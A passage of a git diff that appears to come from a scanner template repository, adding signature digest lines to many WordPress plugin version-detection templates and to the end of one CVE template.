http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/simple-history.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 201 files changed, 201 insertions(+) diff --git a/http/cves/2024/CVE-2024-34102.yaml b/http/cves/2024/CVE-2024-34102.yaml index debe60ad35..eea563d83e 100644 --- a/http/cves/2024/CVE-2024-34102.yaml +++ b/http/cves/2024/CVE-2024-34102.yaml @@ -39,3 +39,4 @@ http: part: header words: - "application/json" +# digest: 4b0a00483046022100e6222a784967f5148b72e2585b0f394f446904586f8fe41c5fe7dc653e67d787022100c1a861f3f02ae0a37f8e0ae99dd731d946a0c00e0ca5f31a609d018e23104dd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..0009eaf953 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b849d5090750dac5c0d5b99549ca2bb002c8570eef31526f0a0547d796947dc3022100ae31ff2447f477b335b6e6bcd6c1f1b83f9303e597f3b4f35ebb8348a828aa48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..28e5918d1b 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205ac0ae43df190aba1e842c121fdb17b3a6d69f960262dda6687092607047b70f022100dd7662c5b43885dcf73d4edb4a143011e9cdc2a1c068ca3695fa9aa97500b1df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..951d47df48 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207d298eba34f2d535a0b756f146c7492366ff3291c78b40dadd77fa51130d967202204c43c55096e5e8fd2b4862bd42dddbeb668ec32e0fa91dcda3682f3646337a7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2e..b409b83dcc 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100deb7839964ad2ca5eb01b28f7f38b76d4dc79760196c895c6a3558712ee342610220479b213c066e5307a808e98fc6c1ba163d1b14dafe52c538bb8d3075860b2485:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..7227f5c629 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a06c84a6a1af34206e7fcf1a063495d83be6c394720a7a0bdf5c1456028aa798022100d76cfd55d4ae9a1d877ef9a2dfb8e882f99014a84c4c8b11cdbd1971aff511d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..91c84ac8cb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206fb5046aca0e8557410522ec86132bd8b7536326d67d20fdbb6c50dafd21211202207da4247305f078cf884684163404bb83856241bd5fe7e0bc9d95357eb29b0e30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..6742223988 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d1145d7bb48a108664c81a1e48b664088e64014b04e24edbc5f7c2bc8fed91b1022100856e907569ab40e7ff6f25efb3ddf7dbc459094481b5dfe4e9e0b14c60cc500c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..1a7b8dece6 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220731a2738d29d5a63339bcb53fd01bbf4c53d926db878ee12591bd73e826a7fd7022100ffea9e3036e294f9bd1efbf3532fd0eec8ee13fd9c25a1b26fae0b95e2b0c333:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..69ff2b8b3b 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a021658de886a54b172986cdbffe0b3cae9df97b011f21950e56bd3f4f8b4f20022004432c652c0f0367a7eea7f6f04cf2e82ed155f8013ea4be8fb17b8357cadd10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..41cd659e0b 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fd5bacbf4e20f8a2348acd181a3e25feb8ed9a408c54792236bf02eb6812ca52022100a4ff42b40ed667c566d4568274c01935b1a58e58f6784f2e2fdd00355aaf00e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..6836307ed9 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022021a56a8238eb94b3eb7c73c8df32c5436356610a177a614a8de56138bbfc1ebe022100e6009a798c216e99cb78f9c2b920c2d4e253ce997750db6b3feeb5a02a35befe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..e989def353 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022064c8956bf3f0914fff0692279db58fcafd9bf5a384b1cd73b5a5848393b877360220181f1b98c7bbb9649ad19cd492c790a23c5f54e71ad466d864251a8e77b36c85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index d462977581..7029bcd4b0 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009f73fd8d09c1c781a858b17a3439bf90b1bd9da4cfdf635fded351c3214a18ae022100f59c4b6a8c497bb1f69f81e9e5c795d28b638ae1594a62de8117a81ca474bc99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..a89a6c6ee7 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200a4769ca176f51a1ca7c92a0ecbf3b2d168da013311414525b0b6d644c7ca523022070695a281ec1e6b86e510037634d95c7fd4975e824a416a6478f000bb4147b6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..8daa2a1f3e 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022013e2df583ef743275f2e3b08358d10bbc055b89a274a75ce728d6beb231a347a022100941b485006b787ec13693d0b8b1bb4e4a8ec04eed1c4af68a1141fde853d3d77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..3e7ae41769 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022017e6a7f6480c52b743c7202b80551cde6cf8999507439429982683cf1a5971fb022100859ec78e02cc0a2bb729aea6bedd8da34f641bac613597b2de7726dba696d6ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..7f10c4b9f4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f1ec45e64ec7c48309974a411a18e545832890e929ce89b03a0aa840282c537c02210086ec08110eb4ef010d45e718bba4d13d53a563af6633669d16c4bb5b73e5866e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..ce7cdbed66 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b66f108601a78999064a7ae36e12a8138a220a26c4c689c62fdc18214500b8290221009a228741a19861b1a6bdaf16f72805a928204381f63fad4540e4be5d4e5c605f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index f8691caf0a..348ddc7de6 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a665a44bb8377d8459df83103f46b2a4706e61296aad2da46936e6d7745febfc02204789e431c05be4f3cb17224fd2df92106505858efb3d7da05db795e3511cd021:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..2eb80ba488 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b02fa1c572363e32086e73e8cba8694c2b793173a9524ab51885a71ba84caecb022100969a3a0495830560343e6d25ef28dc907c7ebef2cef8bd1e3345c5e75a279a5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..608c9b7c81 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220616335a564b4d16bb61b738586289da69054371c2cdb3c862bff62a065ac915c022100a3c276c6a37b75e41ac77da42c827b6d965e1f4ba78395e25352a7e2afba4269:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..aaaf469744 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b1df1c2ba5b6d7b59bdfdd7f9c1ee1f386e69b655f2002406aec9d44ce13ab31022067d6f5b83e86e960815082c9e05fd685c14fa79af3e4320684fdf0f5bcc45c1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..f93a26ce25 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f18b07f0c9008e68095fa39ca4525af996132827ab2711619b6b61c81e7e69ba022100f41687ef7d0a21a37431f556d773a69e68879b839551bd764193768e93757438:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..4635dae412 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210097183a62194df662f2af315d839ffd1ca23c9f694fab23913c3a7d2cb1b45437022100986fece02595f02f8f67a2117bf0f4e67248aa8268c34f55c9b23fce0c9f2d17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..6f7471930d 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202f4315b53d74d10e02316429b629fb2bf8d2c7aa3fb52593dc5b89f402a75f7902210087ce23bb71c8a1817ed9eeca8e45e381f02c03ec517ae758b54d8d43f0e8c09f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..78375fe4ee 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205ebdc35eb5667bf1d984c53b47c2477245b15eb0ef5b00927fdad0f6bdde44c0022100edbc20af98fc5f3c80864d53ed7bf5d97abae8327b1c933822de70aaf550acd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..6e9737a7f0 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f866bd0eb51a97afd82c4df15187f343a8aff6acbe40ec55d0baef1b2b6500db0220637e8bc5b98f5022a55865a9101dc6436a987ad4b32e036b96bde74be176465c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..f2559f1409 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204553ac5edf7f1948c0a0804cabdcba39b2f560126721bcac84ad00285840add502202b89142feabc00121cf39d66908fe874d9b60dadda7af341dc08034602f3ba23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc97..91d420fdd6 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022020b1d0980bcd28031c102b2c8d375e959a22ee6abdfed62319609e52ce7855dc022100b674f9f58578c07dccef80d7337df3c014a6d5c87e1f62ddb386dbcec533b4a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..bcdcbedc8d 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203caf34a35bf74363927225219bdd9e1c79b73c43f4ac2d46f964080292a1d74d02200ad5c97aa78dc738f48cd8ca5387513c891af68e5085b201866c53d2a64aaf44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..fc098bddae 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f7deeb27b1d25fb72dbf4f01e52e5cb014bc5367be5372ef46bb7c49e648f917022100be0cc7ae89ad32a4290bd01b6dd979b067f2a8faf78613958c6020c284a6822b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..0daa8a7a7f 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200c705232b4bfdd550440225505840db591c6ff780a82934c0c5b5a6d6dcf4ccb022100f0bf408d6b0923ff151dc7a067091d2d9232c613b20193f6ddccb1f706356d93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..57b77335f4 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100819a6f811eeab21f068524ea2195997d66fbdf69c5193b5ca2144b4ae3bd45e702200a2fda8d7787a6b7fa4b2f55e3618a3bd141ade76eff378981eff5578e044aa8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..c099d98108 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100da1e037655bec19ae1a4b096e6fd4daf93ed9be868d53b023dfcae3643139a6a022100d2b0e1af7fc376a4cfb4f76732eba552775c687d778e30d01bbc24d0d0cf7034:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..95ec044118 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009c77f47743325657fa7ccd5faad358dd6c149beae01ab02e4232a8e851ec162f022041b2bb3a0a131e0dd890acd291ef7b4ccc9d5f787c2b2dd8bbc812cfce2889ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..c9279818ff 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100eb60649eb1446defc73566275b5566b924d09ffce3c93d480432d7fc32aa4279022070d11c64cc6d17178cdff7e4074f07ec37a8badbb21fc7fb009566ed32543f14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a15..092cedcf52 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009f6aa50f74f61524ecafb90d883659319860d37b7ad4503ffe80171a2318e5890221009c2ce35af9d4dd139d6ccc859c64489a553e2b254764ede9b10e4d7515800e0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..76b81eccc2 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 